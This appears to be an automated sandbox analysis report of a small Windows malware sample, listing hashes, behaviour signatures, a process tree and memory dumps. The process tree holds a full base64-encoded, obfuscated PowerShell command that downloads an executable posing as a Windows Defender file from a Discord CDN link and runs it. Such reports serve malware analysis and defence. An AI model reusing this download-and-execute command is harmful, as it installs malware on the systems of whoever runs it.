Analysis

  • max time kernel
    84s
  • max time network
    87s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    25-12-2022 10:32

General

  • Target

    SecuriteInfo.com.Variant.Marsilia.2083.9036.16697.exe

  • Size

    5KB

  • MD5

    76a7ebc14b56ff57b127630fa4d10df4

  • SHA1

    b8641767f98da027ded8472ee43a7fa01e4855fb

  • SHA256

    fac5d98032b75f647d81a2e6ba452be1ffe03ea4293641db6d1bc68d7c23a3ad

  • SHA512

    818750af409f30426c26b8e5c5e8ef25faa13486bad738619d85c72bf09c2e2943efde13764e0a28d8cab5dda0ed5cbad3afbe66d01bb7e58d3d23f455243aa7

  • SSDEEP

    96:y879lZCFmOKd4Xthbvk+I0AY0sxvk+Iz8Bv8d3ojGrl:yK9loFZKdmfvkTYJvkZW8d7

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Marsilia.2083.9036.16697.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Marsilia.2083.9036.16697.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1784
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAcgBkACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA1ADYAMAA0ADYANQA0ADQANAA2ADIAMgAzADMANwAwAC8AMQAwADUANQA2ADAANAA5ADYAMQA5ADYAOAAzADkANAAzADEAMQAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGEAYQBuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAegBzAGUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZgBqAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANgAuAGUAeABlACcAKQApADwAIwB3AHQAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHgAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZABjAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANgAuAGUAeABlACcAKQA8ACMAcgBrAHQAIwA+AA=="
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1724

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1724-58-0x000007FEF40A0000-0x000007FEF4AC3000-memory.dmp

    Filesize

    10.1MB

  • memory/1724-59-0x000007FEF3540000-0x000007FEF409D000-memory.dmp

    Filesize

    11.4MB

  • memory/1724-60-0x0000000002320000-0x00000000023A0000-memory.dmp

    Filesize

    512KB

  • memory/1724-61-0x0000000002320000-0x00000000023A0000-memory.dmp

    Filesize

    512KB

  • memory/1724-62-0x0000000002320000-0x00000000023A0000-memory.dmp

    Filesize

    512KB

  • memory/1724-63-0x0000000002320000-0x00000000023A0000-memory.dmp

    Filesize

    512KB

  • memory/1784-54-0x0000000000A80000-0x0000000000A88000-memory.dmp

    Filesize

    32KB

  • memory/1784-55-0x000007FEFC421000-0x000007FEFC423000-memory.dmp

    Filesize

    8KB